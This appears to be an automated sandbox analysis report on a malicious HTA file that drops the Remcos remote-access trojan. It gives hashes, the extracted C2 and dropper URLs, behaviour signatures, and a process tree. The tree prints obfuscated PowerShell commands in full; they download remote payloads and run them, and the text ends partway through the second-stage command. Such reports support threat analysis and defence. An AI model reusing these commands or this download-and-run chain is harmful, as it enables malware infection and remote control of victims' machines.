Analysis
-
max time kernel
148s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
28-08-2024 08:22
General
-
Target
IEnetworkopening.hta
-
Size
115KB
-
MD5
bb5e68fafbb6252c482af5b689002ead
-
SHA1
714debd17061508050b6fa9bb38f420b8c9f0de8
-
SHA256
c823da80b57d5d3f17dcd82ce4f7895212d0c9942772a7fdd48f0f93af912536
-
SHA512
a1b7d2ba39b9836846da85ac4ab22ddd47d9d7df3ec54c95eaf00d35647d939fd3296bde8bd6ca29c788dd0aab5242d98244058577ff0937028213f61c88cc72
-
SSDEEP
96:Ea+M7wcrQ1er+1YurUKN8q4TWrTrn1nr88AT:Ea+Qwp131TNf4Ty1oLT
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper
https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Extracted
Family
remcos
Botnet
zynova
C2
cloudsave.duckdns.org:14645
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-CJ3HJ1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Evasion via Device Credential Deployment 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetworkopening.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POwERsheLL -Ex bYPASS -NoP -W 1 -c DEVIcecRedEnTiALdEploymeNt.ExE ; iEX($(iEX('[SYsTEM.TExT.ENCodiNg]'+[cHAr]58+[CHaR]0x3A+'utf8.gETstRing([SYsteM.convERt]'+[chaR]58+[CHAr]0X3a+'FROMbAse64StrinG('+[chAr]0x22+'JG9UUG1MMWNtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUmRFRklOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhBUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVRUTWNnUGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVZmxuVk5vbFFhVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBzTEtzUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkNIT3F0VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1Q295ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9UUG1MMWNtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vOTQuMTQxLjEyMC4xMTEveGFtcHAvRE9NTy9zd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGhoZXIudElGIiwiJGVudjpBUFBEQVRBXHN3ZWV0bmVzc29mY29va2llc21pbGtlYXRpbmdieW1ld2l0aC52QlMiLDAsMCk7U3RBcnQtU0xlRXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGgudkJTIg=='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwERsheLL -Ex bYPASS -NoP -W 1 -c DEVIcecRedEnTiALdEploymeNt.ExE ; iEX($(iEX('[SYsTEM.TExT.ENCodiNg]'+[cHAr]58+[CHaR]0x3A+'utf8.gETstRing([SYsteM.convERt]'+[chaR]58+[CHAr]0X3a+'FROMbAse64StrinG('+[chAr]0x22+'JG9UUG1MMWNtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlUmRFRklOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhBUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVRUTWNnUGh5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVZmxuVk5vbFFhVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBzTEtzUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgalIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkNIT3F0VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1Q295ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9UUG1MMWNtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vOTQuMTQxLjEyMC4xMTEveGFtcHAvRE9NTy9zd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGhoZXIudElGIiwiJGVudjpBUFBEQVRBXHN3ZWV0bmVzc29mY29va2llc21pbGtlYXRpbmdieW1ld2l0aC52QlMiLDAsMCk7U3RBcnQtU0xlRXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzd2VldG5lc3NvZmNvb2tpZXNtaWxrZWF0aW5nYnltZXdpdGgudkJTIg=='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pafbdkxc\pafbdkxc.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCDA0.tmp" "c:\Users\Admin\AppData\Local\Temp\pafbdkxc\CSC3D5D164594E24234B153889060AACDC1.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessofcookiesmilkeatingbymewith.vBS"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBo□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bw□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Og□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQBh□ ⿉ ㋃ ⼏ ⫟Dg□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟z□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟dQBz□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟GM□ ⿉ ㋃ ⼏ ⫟a□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟cgBn□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟3□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBz□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟dgBi□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟LwB2□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bn□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Hc□ ⿉ ㋃ ⼏ ⫟ZQBi□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgB0□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB3□ ⿉ ㋃ ⼏ ⫟C0□ ⿉ ㋃ ⼏ ⫟TwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟VwBl□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟QwBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟B3□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟YgBD□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟aQBl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟bwB3□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BE□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟aQBt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟ZwBl□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBF□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟VQBU□ ⿉ ㋃ ⼏ ⫟EY□ ⿉ ㋃ ⼏ ⫟O□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟By□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bgBn□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟QgB5□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟ZQBz□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟UwBU□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟UgBU□ ⿉ ㋃ ⼏ ⫟D4□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟RQBO□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟+□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟V□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟BP□ ⿉ ㋃ ⼏ ⫟GY□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟Zg□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟RgBs□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bz□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟w□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟r□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GI□ 